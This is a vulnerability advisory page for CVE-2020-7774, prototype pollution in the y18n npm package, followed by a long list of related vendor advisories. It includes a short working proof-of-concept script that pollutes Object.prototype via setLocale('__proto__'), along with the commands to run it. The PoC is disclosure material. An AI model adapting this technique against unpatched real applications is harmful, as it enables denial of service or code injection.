Lucene search
Mohanl0l1-NPM-Y18NHistoryOct 15, 2020 - 12:00 a.m.
Prototype Pollution in yargs/y18n
2020-10-1500:00:00
mohanl0l
www.huntr.dev
22
0.304 Low
EPSS
Percentile
97.0%
Description
y18n is vulnerable to Prototype Pollution.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
const y18n = require('y18n')();
var obj = {}
console.log("Before : " + obj.polluted);
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: 'Yes! Its Polluted'});
console.log("After : " + {}.polluted);
- Execute the following commands in another terminal:
npm i y18n # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Related
redhatcve
redhatcve
CVE-2020-7774
2020-11-17 20:08:56
ubuntucve
ubuntucve
CVE-2020-7774
2020-11-17 00:00:00
cve
cve
CVE-2020-7774
2020-11-17 13:15:12
ibm
ibm
Security Bulletin: Open Source Dependency Vulnerability
2023-05-15 19:04:51
Security Bulletin: Prototype pollution flaw in y18n in IBM DataPower Gateway
2021-08-16 15:09:32
nodejs
nodejs
Prototype Pollution
2021-03-12 23:16:43
debiancve
debiancve
CVE-2020-7774
2020-11-17 13:15:12
veracode
veracode
Prototype Pollution
2020-10-21 09:45:49
osv
osv
Prototype Pollution in y18n
2021-03-29 16:05:12
CVE-2020-7774
2020-11-17 13:15:12
Moderate: nodejs:12 security and bug fix update
2020-12-15 16:03:21
cvelist
cvelist
CVE-2020-7774 Prototype Pollution
2020-11-17 00:00:00
prion
prion
Code injection
2020-11-17 13:15:00
github
github
Prototype Pollution in y18n
2021-03-29 16:05:12
nvd
nvd
CVE-2020-7774
2020-11-17 13:15:12
alpinelinux
alpinelinux
CVE-2020-7774
2020-11-17 13:15:12
mageia
mageia
Updated nodejs packages fix security vulnerabilities
2021-07-25 17:45:06
freebsd
freebsd
Node.js -- April 2021 Security Releases
2021-04-06 00:00:00
nessus
nessus
FreeBSD : Node.js -- April 2021 Security Releases (c0c1834c-9761-11eb-acfd-0022489ad614)
2021-04-14 00:00:00
openSUSE 15 Security Update : nodejs8 (openSUSE-SU-2021:2618-1)
2021-08-06 00:00:00
openSUSE 15 Security Update : nodejs8 (openSUSE-SU-2021:1113-1)
2021-08-11 00:00:00
openvas
openvas
openSUSE: Security Advisory for nodejs8 (openSUSE-SU-2021:2618-1)
2021-08-07 00:00:00
SUSE: Security Advisory (SUSE-SU-2021:2618-1)
2021-08-06 00:00:00
openSUSE: Security Advisory for nodejs8 (openSUSE-SU-2021:1113-1)
2021-08-11 00:00:00
almalinux
almalinux
Moderate: nodejs:12 security and bug fix update
2020-12-15 16:03:21
Moderate: nodejs:14 security and bug fix update
2021-02-16 07:34:42
Moderate: nodejs:10 security update
2021-02-16 07:34:15
suse
suse
Security update for nodejs8 (important)
2021-08-05 00:00:00
Security update for nodejs8 (important)
2021-08-10 00:00:00
Security update for nodejs14 (important)
2021-07-20 00:00:00
nodejsblog
nodejsblog
April 2021 Security Releases
2021-04-06 00:00:00
oraclelinux
oraclelinux
nodejs:12 security and bug fix update
2020-12-17 00:00:00
nodejs:14 security and bug fix update
2021-02-20 00:00:00
nodejs:10 security update
2021-02-20 00:00:00
redhat
redhat
(RHSA-2020:5499) Moderate: nodejs:12 security and bug fix update
2020-12-15 16:03:21
(RHSA-2020:5305) Moderate: rh-nodejs12-nodejs security update
2020-12-01 14:18:32
(RHSA-2021:0551) Moderate: nodejs:14 security and bug fix update
2021-02-16 07:34:42
rocky
rocky
nodejs:12 security and bug fix update
2020-12-15 16:03:21
nodejs:14 security and bug fix update
2021-02-16 07:34:42
nodejs:10 security update
2021-02-16 07:34:15
gentoo
gentoo
Node.js: Multiple Vulnerabilities
2024-05-08 00:00:00
ics
ics
Siemens SINEC INS
2022-03-10 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2021
2021-04-20 00:00:00